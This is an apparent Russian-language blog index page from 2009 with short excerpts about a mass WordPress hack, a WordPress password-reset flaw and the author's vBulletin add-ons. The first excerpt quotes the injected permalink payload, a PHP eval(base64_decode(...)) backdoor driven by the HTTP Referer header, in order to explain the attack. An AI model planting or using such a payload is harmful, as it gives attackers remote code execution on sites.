6 сентября 2009
Намедни случилась большая паника среди wordpress-сообщества: злобные хакеры поломали кучу сайтов на Wordpress. Вскрытие показало, что в движке чуть ли не с рождения имеется большая дыра. Удивительно, что раньше никто на это не обратил внимания. Видимо, из-за отсутствия явно выраженных признаков взлома или не столь массового характера. Проявился взлом в виде “аппендиксов” у урлов примерно такого вида: /%&({${eval(base64_decode($_SERVER[HTTP_REFERER]))}}|.+)&%/
Папа, что это было?
13 августа 2009
Намедни была обнаружена уязвимость WordPress, позволяющая злоумышленнику запросить смену пароля пользователя, у которого в базе нет ключа активации (не было запросов “напоминания” пароля). Чаще всего таким пользователем оказывался admin - первый по списку. Уязвимость не критичная, т.к. пароль менялся на случайный, сгенерированный WP, и отправлялся на почту жертве. (далее…)
18 июля 2009
По просьбам близких мне форумофилов пришлось осваивать Воблу (она же Булка, она же vBulletin). Освоение, как и следовало ожидать, я начал не с админки, а с написания прибамбасов, которые в среде вобловодов зовутся то хаками, то продуктами, то модами. Что из этого вышло - читайте далее
Автор:
БелотицкийРазделы:
vBulletin Comments Off
